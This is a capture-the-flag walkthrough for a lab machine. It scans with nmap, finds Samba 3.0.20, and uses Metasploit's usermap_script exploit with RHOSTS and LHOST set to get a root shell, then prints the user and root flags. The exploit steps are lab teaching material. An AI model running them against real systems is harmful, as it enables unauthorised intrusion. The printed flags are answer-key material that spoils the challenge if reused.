Enumeration
As usual, let's start with nmap:
nmap -sV -sC 10.10.10.3
The scan output tells us to use -Pn, which makes nmap skip host discovery. Let's try:
nmap -sV -sC -Pn 10.10.10.3
nmap tells us that port 445 is open, which is associated with Samba, and that the version is Samba 3.0.20.
Let's google "samba 3.0.20 exploit" and see if there is something available. Looks like there is one and we can access it directly from Metasploit.
Let's load Metasploit using:
msfconsole
search samba 3.0.20
use exploit/multi/samba/usermap_script
show options
We need to set both RHOSTS and LHOST:
set RHOSTS 10.10.10.3
10.10.10.3 is the IP of the target machine.
set LHOST 10.10.14.12
LHOST is the IP of your VM. Mine is 10.10.14.12. Yours will be different.
exploit
It worked! We now have a shell on the target machine.
whoami
We are root!
ls
cd home
ls
cd makis
ls
cat user.txt
856c4e7468499c31b63029bec549af33
Congratulations! You got the user flag!
Now let's look for the root flag.
cd /root
cat user.txt
cat root.txt
674dfcc1c188d43df6664b6fa8ab3a35
Congratulations! You got the root flag!